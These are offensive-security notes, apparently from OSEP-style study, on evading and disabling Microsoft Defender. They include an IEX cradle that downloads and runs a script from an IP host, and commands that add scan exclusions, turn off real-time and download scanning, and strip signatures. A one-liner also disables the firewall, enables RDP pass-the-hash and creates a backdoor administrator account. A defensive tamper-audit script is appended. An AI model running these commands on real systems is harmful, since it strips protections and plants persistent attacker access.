Microsoft Defender Antivirus
1. On-Disk Detections
Even though dropping files to disk has a bad reputation, there are instances where it's fairly unavoidable if we want to use certain tactics.
For example, we have access to a server, but we can't PsExec to it because the service binary payload is being detected by Defender.
We can check it locally by copying the payload to the desktop and then reading the most recent entry in the Defender detection log:
copy C:\Payloads\smb_x64.svc.exe .\Desktop\
Get-MpThreatDetection | Sort-Object InitialDetectionTime -Descending | Select-Object -First 1
Cobalt Strike Artifact Kit can be used to modify binary (EXE and DLL) payloads.
2. In-Memory Detections
The Antimalware Scan Interface (AMSI) is a component of Windows which allows applications to integrate themselves with an antivirus engine by providing a consumable, language agnostic interface. It was designed to tackle "fileless" malware that was so heavily popularised by tools like the EmpireProject, which leveraged PowerShell for complete in-memory C2.
The alert that Defender produces is tagged with amsi: rather than file:, indicating that something malicious was detected in memory.
PowerShell files are a little easier to analyse than binary files: scanning one with ThreatCheck and the -e AMSI parameter shows the bad strings.
C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\smb_x64.ps1 -e AMSI
Cobalt Strike Resource Kit can be used to modify script-based payloads including the PowerShell, Python, HTA and VBA templates.
3. Behavioral Detections
When dealing with behavioural detections, the Defender alerts look something like this:
In this example, a Beacon is running inside the rundll32 process (PID 4404), which is the default and a very common point of detection.
4. Enumeration
We want to determine which product is in place in order to simplify our bypass attempt. We also need to know if the antivirus supports AMSI.
To do this, we can use HostRecon.ps1.
powershell (new-object system.net.webclient).downloadstring('http://192.168.119.120/HostRecon.ps1') | IEX
Invoke-HostRecon
To determine whether LSA protection (RunAsPPL) is enabled, use the Get-ItemProperty cmdlet:
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
In the same way, we can list the AppLocker executable rules:
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
5. Disabling
See excluded paths:
Get-MpPreference | select-object -ExpandProperty ExclusionPath
Add an exclusion directory:
Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads\SuperLegitDownloadDirectory"
Disable realtime monitoring altogether:
Set-MpPreference -DisableRealtimeMonitoring $true
Disable only the scanning of downloaded files and attachments (IOAV protection):
Set-MpPreference -DisableIOAVProtection $true
To remove all virus signatures from the engine:
cd "C:\Program Files\Windows Defender"
.\MpCmdRun.exe -RemoveDefinitions -All
PowerShell one-liner to remove the virus signatures, disable real-time monitoring, disable download scanning, disable the firewall, enable Restricted Admin mode for RDP pass-the-hash, and create a user "pepe" who is added to the Administrators, Remote Desktop Users and Remote Management Users groups:
cd "C:\Program Files\Windows Defender" ; .\MpCmdRun.exe -RemoveDefinitions -All ; Set-NetFirewallProfile -Enabled False ; Set-MpPreference -DisableRealtimeMonitoring $true ; Set-MpPreference -DisableIOAVProtection $true ; cd "C:\Windows\Tasks" ; New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0 ; net user pepe Password123! /add; net localgroup Administrators pepe /add; net localgroup "Remote Desktop Users" pepe /add; net localgroup "Remote Management Users" pepe /add
We can also disable it with tools like:
https://github.com/In3x0rabl3/OSEP/blob/main/Bypass_Defender/DefendersDeath.ps1
https://github.com/In3x0rabl3/OSEP/blob/main/Bypass_Defender/FuckDefender.ps1
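A defensive counterpart to this section, added here and not part of the original notes: a PowerShell audit that reports exactly the changes the commands above make (exclusions, disabled real-time/IOAV/behaviour monitoring, removed signatures, the two LSA values) plus the Defender operational-log events that record them. It assumes the Defender PowerShell module is present and the session is elevated (needed for the event log query).

```powershell
# Added audit script, not from the original notes. Reports Defender and LSA
# settings that the "Disabling" and "Enumeration" commands above change,
# so a host can be checked for tampering. Assumes an elevated session.
function Test-DefenderTampering {
    $findings = New-Object System.Collections.Generic.List[string]
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus

    # Exclusions are the quietest bypass (Add-MpPreference -ExclusionPath); list every entry.
    foreach ($p in @($pref.ExclusionPath))      { if ($p) { $findings.Add("Path exclusion: $p") } }
    foreach ($p in @($pref.ExclusionProcess))   { if ($p) { $findings.Add("Process exclusion: $p") } }
    foreach ($e in @($pref.ExclusionExtension)) { if ($e) { $findings.Add("Extension exclusion: $e") } }

    # Engine features switched off with Set-MpPreference.
    if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Real-time monitoring is disabled') }
    if (-not $status.IoavProtectionEnabled)     { $findings.Add('IOAV (download/attachment) scanning is disabled') }
    if (-not $status.BehaviorMonitorEnabled)    { $findings.Add('Behavior monitoring is disabled') }
    if (-not $status.IsTamperProtected)         { $findings.Add('Tamper Protection is off') }

    # MpCmdRun -RemoveDefinitions leaves the engine with missing or very old signatures.
    if ($status.AntivirusSignatureAge -gt 7) {
        $findings.Add("Signatures are $($status.AntivirusSignatureAge) days old (last update $($status.AntivirusSignatureLastUpdated))")
    }

    # LSA values probed in the enumeration section and changed by the one-liner.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    if ($lsa.RunAsPPL -ne 1)               { $findings.Add('LSA protection (RunAsPPL) is not enabled') }
    if ($lsa.DisableRestrictedAdmin -eq 0) { $findings.Add('Restricted Admin mode for RDP is enabled (DisableRestrictedAdmin = 0)') }

    # Defender operational log: these IDs record protection being switched off or the
    # configuration changing (5001, 5004, 5007, 5010, 5012 per Microsoft's event reference).
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004, 5007, 5010, 5012
        StartTime = (Get-Date).AddDays(-7)
    } -ErrorAction SilentlyContinue
    foreach ($ev in $events) {
        $findings.Add("Event $($ev.Id) at $($ev.TimeCreated): $($ev.Message.Split("`n")[0])")
    }

    return $findings
}

Test-DefenderTampering | ForEach-Object { Write-Output "[!] $_" }
```

An empty result means none of the settings touched by this page were found changed and no tamper events were logged in the last seven days.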